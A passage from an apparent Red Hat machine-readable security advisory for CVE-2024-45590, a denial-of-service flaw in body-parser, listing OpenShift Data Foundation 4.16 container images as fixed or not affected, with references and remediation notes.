"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311171"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "body-parser: Denial of Service Vulnerability in body-parser",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"known_not_affected": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45590"
},
{
"category": "external",
"summary": "RHBZ#2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce",
"url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7",
"url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7"
}
],
"release_date": "2024-09-10T16:15:21.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-15T08:52:38+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
